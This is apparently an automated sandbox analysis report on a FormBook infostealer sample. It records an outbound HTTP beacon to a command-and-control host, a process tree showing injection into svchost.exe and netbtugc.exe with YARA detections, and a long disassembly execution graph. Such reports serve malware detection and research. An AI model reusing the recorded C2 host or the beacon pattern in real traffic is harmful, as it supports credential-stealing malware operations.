                                              32          192.168.2.7  52139        43.242.202.169  80                4052  C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp                             Bytes transferred  Direction  Data
                                              Sep 25, 2024 11:39:12.892497063 CEST  570                OUT        GET /e0nr/?7lpPGx=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txL3dlYbix0Oof31N0WjWMIZqIkiGsjqX+LyUecOwrV8dky8MLclvmAsWX&QF4tL=lBP8AZrpnb HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mizuquan.top
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:39:13.754086971 CEST  691                IN         HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:39:13 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Target ID:0
                                              Start time:05:36:06
                                              Start date:25/09/2024
                                              Path:C:\Users\user\Desktop\CYTAT.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CYTAT.exe"
                                              Imagebase:0x400000
                                              File size:1'357'205 bytes
                                              MD5 hash:A1EECC39C791B5A57C0E914B116A1672
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:4
                                              Start time:05:36:09
                                              Start date:25/09/2024
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CYTAT.exe"
                                              Imagebase:0x1b0000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:05:36:22
                                              Start date:25/09/2024
                                              Path:C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe"
                                              Imagebase:0x9f0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:12
                                              Start time:05:36:24
                                              Start date:25/09/2024
                                              Path:C:\Windows\SysWOW64\netbtugc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                              Imagebase:0xe10000
                                              File size:22'016 bytes
                                              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:13
                                              Start time:06:56:00
                                              Start date:25/09/2024
                                              Path:C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe"
                                              Imagebase:0x9f0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:16
                                              Start time:06:56:27
                                              Start date:25/09/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff722870000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                                Execution Graph

                                                Execution Coverage:3.4%
                                                Dynamic/Decrypted Code Coverage:0.4%
                                                Signature Coverage:8.8%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:35
                                                execution_graph 86115 4010e0 86118 401100 86115->86118 86117 4010f8 86119 401113 86118->86119 86120 401120 86119->86120 86121 401184 86119->86121 86122 40114c 86119->86122 86152 401182 86119->86152 86123 40112c DefWindowProcW 86120->86123 86177 401000 Shell_NotifyIconW __setmbcp_nolock 86120->86177 86156 401250 86121->86156 86124 401151 86122->86124 86125 40119d 86122->86125 86123->86117 86129 401219 86124->86129 86130 40115d 86124->86130 86127 4011a3 86125->86127 86128 42afb4 86125->86128 86127->86120 86137 4011b6 KillTimer 86127->86137 86138 4011db SetTimer RegisterWindowMessageW 86127->86138 86172 40f190 10 API calls 86128->86172 86129->86120 86134 401225 86129->86134 86132 401163 86130->86132 86133 42b01d 86130->86133 86131 401193 86131->86117 86139 42afe9 86132->86139 86140 40116c 86132->86140 86133->86123 86176 4370f4 52 API calls 86133->86176 86188 468b0e 74 API calls __setmbcp_nolock 86134->86188 86171 401000 Shell_NotifyIconW __setmbcp_nolock 86137->86171 86138->86131 86145 401204 CreatePopupMenu 86138->86145 86174 40f190 10 API calls 86139->86174 86140->86120 86147 401174 86140->86147 86141 42b04f 86178 40e0c0 86141->86178 86145->86117 86173 45fd57 65 API calls __setmbcp_nolock 86147->86173 86149 42afe4 86149->86131 86150 42b00e 86175 401a50 331 API calls 86150->86175 86151 4011c9 PostQuitMessage 86151->86117 86152->86123 86155 42afdc 86155->86123 86155->86149 86157 401262 __setmbcp_nolock 86156->86157 86158 4012e8 86156->86158 86189 401b80 86157->86189 86158->86131 86160 40128c 86161 4012d1 KillTimer SetTimer 86160->86161 86162 4012bb 86160->86162 86163 4272ec 86160->86163 86161->86158 86164 4012c5 86162->86164 86165 42733f 86162->86165 86166 4272f4 Shell_NotifyIconW 86163->86166 86167 42731a Shell_NotifyIconW 86163->86167 86164->86161 86168 427393 Shell_NotifyIconW 86164->86168 86169 427348 Shell_NotifyIconW 86165->86169 86170 42736e Shell_NotifyIconW 86165->86170 86166->86161 86167->86161 86168->86161 
86169->86161 86170->86161 86171->86151 86172->86131 86173->86155 86174->86150 86175->86152 86176->86152 86177->86141 86180 40e0e7 __setmbcp_nolock 86178->86180 86179 40e142 86185 40e184 86179->86185 86287 4341e6 63 API calls __wcsicoll 86179->86287 86180->86179 86181 42729f DestroyIcon 86180->86181 86181->86179 86183 40e1a0 Shell_NotifyIconW 86186 401b80 54 API calls 86183->86186 86184 4272db Shell_NotifyIconW 86185->86183 86185->86184 86187 40e1ba 86186->86187 86187->86152 86188->86149 86190 401b9c 86189->86190 86209 401c7e 86189->86209 86211 4013c0 86190->86211 86193 42722b LoadStringW 86196 427246 86193->86196 86194 401bb9 86216 402160 86194->86216 86230 40e0a0 86196->86230 86197 401bcd 86199 427258 86197->86199 86200 401bda 86197->86200 86234 40d200 52 API calls 2 library calls 86199->86234 86200->86196 86201 401be4 86200->86201 86229 40d200 52 API calls 2 library calls 86201->86229 86204 427267 86205 42727b 86204->86205 86207 401bf3 _wcscpy __setmbcp_nolock _wcsncpy 86204->86207 86235 40d200 52 API calls 2 library calls 86205->86235 86208 401c62 Shell_NotifyIconW 86207->86208 86208->86209 86209->86160 86210 427289 86236 4115d7 86211->86236 86217 426daa 86216->86217 86218 40216b _wcslen 86216->86218 86274 40c600 86217->86274 86221 402180 86218->86221 86222 40219e 86218->86222 86220 426db5 86220->86197 86273 403bd0 52 API calls moneypunct 86221->86273 86224 4013a0 52 API calls 86222->86224 86226 4021a5 86224->86226 86225 402187 _memmove 86225->86197 86227 426db7 86226->86227 86228 4115d7 52 API calls 86226->86228 86228->86225 86229->86207 86231 40e0b2 86230->86231 86232 40e0a8 86230->86232 86231->86207 86286 403c30 52 API calls _memmove 86232->86286 86234->86204 86235->86210 86238 4115e1 _malloc 86236->86238 86239 4013e4 86238->86239 86242 4115fd std::exception::exception 86238->86242 86250 4135bb 86238->86250 86247 4013a0 86239->86247 86240 41163b 86265 4180af 46 API calls std::exception::operator= 86240->86265 86242->86240 86264 41130a 51 API calls __cinit 
86242->86264 86243 411645 86266 418105 RaiseException 86243->86266 86246 411656 86248 4115d7 52 API calls 86247->86248 86249 4013a7 86248->86249 86249->86193 86249->86194 86251 413638 _malloc 86250->86251 86254 4135c9 _malloc 86250->86254 86272 417f77 46 API calls __getptd_noexit 86251->86272 86252 4135d4 86252->86254 86267 418901 46 API calls 2 library calls 86252->86267 86268 418752 46 API calls 9 library calls 86252->86268 86269 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86252->86269 86254->86252 86256 4135f7 RtlAllocateHeap 86254->86256 86259 413624 86254->86259 86262 413622 86254->86262 86256->86254 86257 413630 86256->86257 86257->86238 86270 417f77 46 API calls __getptd_noexit 86259->86270 86271 417f77 46 API calls __getptd_noexit 86262->86271 86264->86240 86265->86243 86266->86246 86267->86252 86268->86252 86270->86262 86271->86257 86272->86257 86273->86225 86275 40c619 86274->86275 86276 40c60a 86274->86276 86275->86220 86276->86275 86279 4026f0 86276->86279 86278 426d7a _memmove 86278->86220 86280 426873 86279->86280 86281 4026ff 86279->86281 86282 4013a0 52 API calls 86280->86282 86281->86278 86283 42687b 86282->86283 86284 4115d7 52 API calls 86283->86284 86285 42689e _memmove 86284->86285 86285->86278 86286->86231 86287->86185 86288 40bd20 86290 428194 86288->86290 86291 40bd2d 86288->86291 86289 40bd43 86290->86289 86293 4281bc 86290->86293 86295 4281b2 86290->86295 86297 40bd37 86291->86297 86311 4531b1 85 API calls 5 library calls 86291->86311 86310 45e987 86 API calls moneypunct 86293->86310 86309 40b510 VariantClear 86295->86309 86300 40bd50 86297->86300 86299 4281ba 86301 426cf1 86300->86301 86302 40bd63 86300->86302 86321 44cde9 52 API calls _memmove 86301->86321 86312 40bd80 86302->86312 86305 40bd73 86305->86289 86306 426cfc 86307 40e0a0 52 API calls 86306->86307 86308 426d02 86307->86308 86309->86299 86310->86291 86311->86297 86313 40bd8e 86312->86313 86320 40bdb7 _memmove 86312->86320 86314 40bded 86313->86314 
86315 40bdad 86313->86315 86313->86320 86316 4115d7 52 API calls 86314->86316 86322 402f00 86315->86322 86318 40bdf6 86316->86318 86319 4115d7 52 API calls 86318->86319 86318->86320 86319->86320 86320->86305 86321->86306 86323 402f10 86322->86323 86324 402f0c 86322->86324 86325 4115d7 52 API calls 86323->86325 86326 4268c3 86323->86326 86324->86320 86327 402f51 moneypunct _memmove 86325->86327 86327->86320 86328 425ba2 86333 40e360 86328->86333 86330 425bb4 86349 41130a 51 API calls __cinit 86330->86349 86332 425bbe 86334 4115d7 52 API calls 86333->86334 86335 40e3ec GetModuleFileNameW 86334->86335 86350 413a0e 86335->86350 86337 40e421 _wcsncat 86353 413a9e 86337->86353 86340 4115d7 52 API calls 86341 40e45e _wcscpy 86340->86341 86356 40bc70 86341->86356 86345 40e4a9 86345->86330 86346 40e4a1 _wcscat _wcslen _wcsncpy 86346->86345 86347 401c90 52 API calls 86346->86347 86348 4115d7 52 API calls 86346->86348 86347->86346 86348->86346 86349->86332 86375 413801 86350->86375 86405 419efd 86353->86405 86357 4115d7 52 API calls 86356->86357 86358 40bc98 86357->86358 86359 4115d7 52 API calls 86358->86359 86360 40bca6 86359->86360 86361 40e4c0 86360->86361 86417 403350 86361->86417 86363 40e4cb RegOpenKeyExW 86364 427190 RegQueryValueExW 86363->86364 86365 40e4eb 86363->86365 86366 4271b0 86364->86366 86367 42721a RegCloseKey 86364->86367 86365->86346 86368 4115d7 52 API calls 86366->86368 86367->86346 86369 4271cb 86368->86369 86424 43652f 52 API calls 86369->86424 86371 4271d8 RegQueryValueExW 86372 42720e 86371->86372 86373 4271f7 86371->86373 86372->86367 86374 402160 52 API calls 86373->86374 86374->86372 86376 41389e 86375->86376 86383 41381a 86375->86383 86377 4139e8 86376->86377 86379 413a00 86376->86379 86402 417f77 46 API calls __getptd_noexit 86377->86402 86404 417f77 46 API calls __getptd_noexit 86379->86404 86380 4139ed 86403 417f25 10 API calls __wsplitpath_helper 86380->86403 86383->86376 86388 41388a 86383->86388 86397 419e30 46 API calls 
__wsplitpath_helper 86383->86397 86385 41396c 86385->86376 86386 413967 86385->86386 86389 41397a 86385->86389 86386->86337 86387 413929 86387->86376 86390 413945 86387->86390 86399 419e30 46 API calls __wsplitpath_helper 86387->86399 86388->86376 86396 413909 86388->86396 86398 419e30 46 API calls __wsplitpath_helper 86388->86398 86401 419e30 46 API calls __wsplitpath_helper 86389->86401 86390->86376 86390->86386 86393 41395b 86390->86393 86400 419e30 46 API calls __wsplitpath_helper 86393->86400 86396->86385 86396->86387 86397->86388 86398->86396 86399->86390 86400->86386 86401->86386 86402->86380 86403->86386 86404->86386 86406 419f13 86405->86406 86407 419f0e 86405->86407 86414 417f77 46 API calls __getptd_noexit 86406->86414 86407->86406 86413 419f2b 86407->86413 86409 419f18 86415 417f25 10 API calls __wsplitpath_helper 86409->86415 86412 40e454 86412->86340 86413->86412 86416 417f77 46 API calls __getptd_noexit 86413->86416 86414->86409 86415->86412 86416->86409 86418 403367 86417->86418 86419 403358 86417->86419 86420 4115d7 52 API calls 86418->86420 86419->86363 86421 403370 86420->86421 86422 4115d7 52 API calls 86421->86422 86423 40339e 86422->86423 86423->86363 86424->86371 86425 416454 86462 416c70 86425->86462 86427 416460 GetStartupInfoW 86428 416474 86427->86428 86463 419d5a HeapCreate 86428->86463 86430 4164cd 86431 4164d8 86430->86431 86547 41642b 46 API calls 3 library calls 86430->86547 86464 417c20 GetModuleHandleW 86431->86464 86434 4164de 86435 4164e9 __RTC_Initialize 86434->86435 86548 41642b 46 API calls 3 library calls 86434->86548 86483 41aaa1 GetStartupInfoW 86435->86483 86439 416503 GetCommandLineW 86496 41f584 GetEnvironmentStringsW 86439->86496 86443 416513 86502 41f4d6 GetModuleFileNameW 86443->86502 86445 41651d 86446 416528 86445->86446 86550 411924 46 API calls 3 library calls 86445->86550 86506 41f2a4 86446->86506 86449 41652e 86450 416539 86449->86450 86551 411924 46 API calls 3 library calls 86449->86551 86520 411703 
87763->87755 87764->87755 87765->86817 87766->86818 87768 42c5fe 87767->87768 87782 4091c6 87767->87782 87769 40bc70 52 API calls 87768->87769 87768->87782 87770 42c64e InterlockedIncrement 87769->87770 87771 42c665 87770->87771 87775 42c697 87770->87775 87773 42c672 InterlockedDecrement Sleep InterlockedIncrement 87771->87773 87771->87775 87772 42c737 InterlockedDecrement 87774 42c74a 87772->87774 87773->87771 87773->87775 87776 408f40 VariantClear 87774->87776 87775->87772 87797 42c731 87775->87797 88060 408e80 87775->88060 87778 42c752 87776->87778 88069 410c60 VariantClear moneypunct 87778->88069 87782->86865 87783 42c6db 87784 402160 52 API calls 87783->87784 87785 42c6e5 87784->87785 88065 45340c 85 API calls 87785->88065 87787 42c6f1 88066 40d200 52 API calls 2 library calls 87787->88066 87789 42c6fb 88067 465124 53 API calls 87789->88067 87791 42c715 87792 42c76a 87791->87792 87793 42c719 87791->87793 87794 401b10 52 API calls 87792->87794 88068 46fe32 VariantClear 87793->88068 87796 42c77e 87794->87796 87798 401980 53 API calls 87796->87798 87797->87772 87803 42c796 87798->87803 87799 42c812 88071 46fe32 VariantClear 87799->88071 87801 42c82a InterlockedDecrement 88072 46ff07 54 API calls 87801->88072 87803->87799 87804 42c864 87803->87804 88070 40ba10 52 API calls 2 library calls 87803->88070 88073 45e737 90 API calls 3 library calls 87804->88073 87806 42c9ec 88116 47d33e 331 API calls 87806->88116 87809 42c9fe 88117 46feb1 VariantClear VariantClear 87809->88117 87811 408f40 VariantClear 87821 42c849 87811->87821 87812 42ca08 87814 401b10 52 API calls 87812->87814 87813 408f40 VariantClear 87816 42c891 87813->87816 87815 42ca15 87814->87815 87817 40c2c0 52 API calls 87815->87817 88074 410c60 VariantClear moneypunct 87816->88074 87822 42c874 87817->87822 87819 401980 53 API calls 87819->87821 87820 402780 52 API calls 87820->87821 87821->87806 87821->87811 87821->87819 87821->87820 88075 40a780 87821->88075 87822->87813 87824 42ca59 87822->87824 
87824->87824 87826 40afc4 87825->87826 87827 40b156 87825->87827 87828 40afd5 87826->87828 87829 42d1e3 87826->87829 88127 45e737 90 API calls 3 library calls 87827->88127 87834 40a780 194 API calls 87828->87834 87846 40b11a moneypunct 87828->87846 88128 45e737 90 API calls 3 library calls 87829->88128 87832 42d1f8 87839 408f40 VariantClear 87832->87839 87833 40b143 87833->86865 87836 40b00a 87834->87836 87836->87832 87838 40b012 87836->87838 87837 42d4db 87837->87837 87840 40b04a 87838->87840 87843 42d231 VariantClear 87838->87843 87850 40b094 moneypunct 87838->87850 87839->87833 87848 40b05c moneypunct 87840->87848 88129 40e270 VariantClear moneypunct 87840->88129 87841 42d425 moneypunct 87844 42d45a VariantClear 87841->87844 87841->87846 87842 40b108 87842->87846 88130 40e270 VariantClear moneypunct 87842->88130 87843->87848 87844->87846 87846->87833 88131 45e737 90 API calls 3 library calls 87846->88131 87847 4115d7 52 API calls 87847->87850 87848->87847 87848->87850 87850->87841 87850->87842 87852 40900d 87851->87852 87853 408fff 87851->87853 87856 42c3f6 87852->87856 87858 40a780 194 API calls 87852->87858 87859 42c44a 87852->87859 87862 42c47b 87852->87862 87863 42c4cb 87852->87863 87864 42c564 87852->87864 87867 42c548 87852->87867 87871 409112 87852->87871 87873 42c528 87852->87873 87875 4090df 87852->87875 87876 4090ea 87852->87876 87885 4090f2 moneypunct 87852->87885 88134 4534e3 52 API calls 87852->88134 88136 40c4e0 194 API calls 87852->88136 88132 403ea0 52 API calls __cinit 87853->88132 88135 45e737 90 API calls 3 library calls 87856->88135 87858->87852 88137 45e737 90 API calls 3 library calls 87859->88137 88138 451b42 61 API calls 87862->88138 88140 47faae 233 API calls 87863->88140 87868 408f40 VariantClear 87864->87868 88143 45e737 90 API calls 3 library calls 87867->88143 87868->87885 87869 42c491 87869->87885 88139 45e737 90 API calls 3 library calls 87869->88139 87870 42c4da 87870->87885 88141 45e737 90 API calls 3 library calls 87870->88141 
87871->87867 87878 40912b 87871->87878 88142 45e737 90 API calls 3 library calls 87873->88142 87875->87876 87880 408e80 VariantClear 87875->87880 87881 408f40 VariantClear 87876->87881 87878->87885 88133 403e10 53 API calls 87878->88133 87880->87876 87881->87885 87883 40914b 87884 408f40 VariantClear 87883->87884 87884->87885 87885->86865 88144 408d90 87886->88144 87888 429778 88171 410c60 VariantClear moneypunct 87888->88171 87890 429780 87891 408cf9 87891->87888 87892 42976c 87891->87892 87894 408d2d 87891->87894 88170 45e737 90 API calls 3 library calls 87892->88170 88160 403d10 87894->88160 87897 408d71 moneypunct 87897->86865 87898 408f40 VariantClear 87899 408d45 moneypunct 87898->87899 87899->87897 87899->87898 87901 425c87 87900->87901 87902 40d15f 87900->87902 87903 425cc7 87901->87903 87904 425ca1 TranslateAcceleratorW 87901->87904 87902->86865 87904->87902 87906 42602f 87905->87906 87907 40d17f 87905->87907 87906->86865 87908 40d18c 87907->87908 87909 42608e IsDialogMessageW 87907->87909 88445 430c46 GetClassLongW 87907->88445 87908->86865 87909->87907 87909->87908 87912 4096c6 _wcslen 87911->87912 87913 4115d7 52 API calls 87912->87913 87974 40a70c moneypunct _memmove 87912->87974 87914 4096fa _memmove 87913->87914 87915 4115d7 52 API calls 87914->87915 87918 40971b 87915->87918 87916 4013a0 52 API calls 87917 4297aa 87916->87917 87919 4115d7 52 API calls 87917->87919 87920 409749 CharUpperBuffW 87918->87920 87922 40976a moneypunct 87918->87922 87918->87974 87962 4297d1 _memmove 87919->87962 87920->87922 87970 4097e5 moneypunct 87922->87970 88447 47dcbb 196 API calls 87922->88447 87924 408f40 VariantClear 87925 42ae92 87924->87925 88474 410c60 VariantClear moneypunct 87925->88474 87927 42aea4 87928 409aa2 87930 4115d7 52 API calls 87928->87930 87934 409afe 87928->87934 87928->87962 87929 40a689 87931 4115d7 52 API calls 87929->87931 87930->87934 87953 40a6af moneypunct _memmove 87931->87953 87932 409b2a 87936 429dbe 87932->87936 88002 409b4d moneypunct 
_memmove 87932->88002 88455 40b400 VariantClear VariantClear moneypunct 87932->88455 87933 40c2c0 52 API calls 87933->87970 87934->87932 87935 4115d7 52 API calls 87934->87935 87937 429d31 87935->87937 87941 429dd3 87936->87941 88456 40b400 VariantClear VariantClear moneypunct 87936->88456 87940 429d42 87937->87940 88452 44a801 52 API calls 87937->88452 87938 409fd2 87944 40a045 87938->87944 87999 42a3f5 87938->87999 87951 40e0a0 52 API calls 87940->87951 87941->88002 88457 40e1c0 VariantClear moneypunct 87941->88457 87942 429a46 VariantClear 87942->87970 87948 4115d7 52 API calls 87944->87948 87945 408f40 VariantClear 87945->87970 87955 40a04c 87948->87955 87950 4115d7 52 API calls 87950->87970 87956 429d57 87951->87956 87954 4115d7 52 API calls 87953->87954 87954->87974 87960 40a0a7 87955->87960 87964 4091e0 317 API calls 87955->87964 88453 453443 52 API calls 87956->88453 87958 42a42f 88461 45e737 90 API calls 3 library calls 87958->88461 87983 40a0af 87960->87983 88462 40c790 VariantClear moneypunct 87960->88462 87961 4299d9 87965 408f40 VariantClear 87961->87965 88473 45e737 90 API calls 3 library calls 87962->88473 87964->87960 87969 4299e2 87965->87969 87966 429abd 87966->86865 87967 429d88 88454 453443 52 API calls 87967->88454 88449 410c60 VariantClear moneypunct 87969->88449 87970->87928 87970->87929 87970->87933 87970->87942 87970->87945 87970->87950 87970->87953 87970->87961 87970->87962 87970->87966 87976 40a780 194 API calls 87970->87976 87978 42a452 87970->87978 88448 40c4e0 194 API calls 87970->88448 88450 40ba10 52 API calls 2 library calls 87970->88450 88451 40e270 VariantClear moneypunct 87970->88451 87974->87916 87976->87970 87977 402780 52 API calls 87977->88002 87978->87924 87979 44a801 52 API calls 87979->88002 87981 408f40 VariantClear 88011 40a162 moneypunct _memmove 87981->88011 87982 41130a 51 API calls __cinit 87982->88002 87984 40a11b 87983->87984 87985 42a4b4 VariantClear 87983->87985 87983->88011 87991 40a12d moneypunct 87984->87991 
88463 40e270 VariantClear moneypunct 87984->88463 87985->87991 87986 40a780 194 API calls 87986->88002 87987 408e80 VariantClear 87987->88002 87989 401980 53 API calls 87989->88002 87990 4115d7 52 API calls 87990->88011 87991->87990 87991->88011 87992 408e80 VariantClear 87992->88011 87994 42a74d VariantClear 87994->88011 87995 4115d7 52 API calls 87995->88002 87996 40a368 87998 42aad4 87996->87998 88006 40a397 87996->88006 87997 40e270 VariantClear 87997->88011 88466 46fe90 VariantClear VariantClear moneypunct 87998->88466 88460 47390f VariantClear 87999->88460 88000 42a7e4 VariantClear 88000->88011 88001 42a886 VariantClear 88001->88011 88002->87938 88002->87958 88002->87974 88002->87977 88002->87979 88002->87982 88002->87986 88002->87987 88002->87989 88002->87995 88002->87999 88003 409c95 88002->88003 88458 45f508 52 API calls 88002->88458 88459 403e10 53 API calls 88002->88459 88003->86865 88004 40a3ce 88018 40a3d9 moneypunct 88004->88018 88467 40b400 VariantClear VariantClear moneypunct 88004->88467 88006->88004 88030 40a42c moneypunct 88006->88030 88446 40b400 VariantClear VariantClear moneypunct 88006->88446 88009 42abaf 88014 42abd4 VariantClear 88009->88014 88024 40a4ee moneypunct 88009->88024 88010 4115d7 52 API calls 88010->88011 88011->87981 88011->87992 88011->87994 88011->87996 88011->87997 88011->87998 88011->88000 88011->88001 88011->88010 88013 4115d7 52 API calls 88011->88013 88464 470870 52 API calls 88011->88464 88465 44ccf1 VariantClear moneypunct 88011->88465 88012 40a4dc 88012->88024 88469 40e270 VariantClear moneypunct 88012->88469 88015 42a5a6 VariantInit VariantCopy 88013->88015 88014->88024 88015->88011 88020 42a5c6 VariantClear 88015->88020 88016 42ac4f 88025 42ac79 VariantClear 88016->88025 88031 40a546 moneypunct 88016->88031 88019 40a41a 88018->88019 88022 42ab44 VariantClear 88018->88022 88018->88030 88019->88030 88468 40e270 VariantClear moneypunct 88019->88468 88020->88011 88021 40a534 88021->88031 88470 40e270 VariantClear 
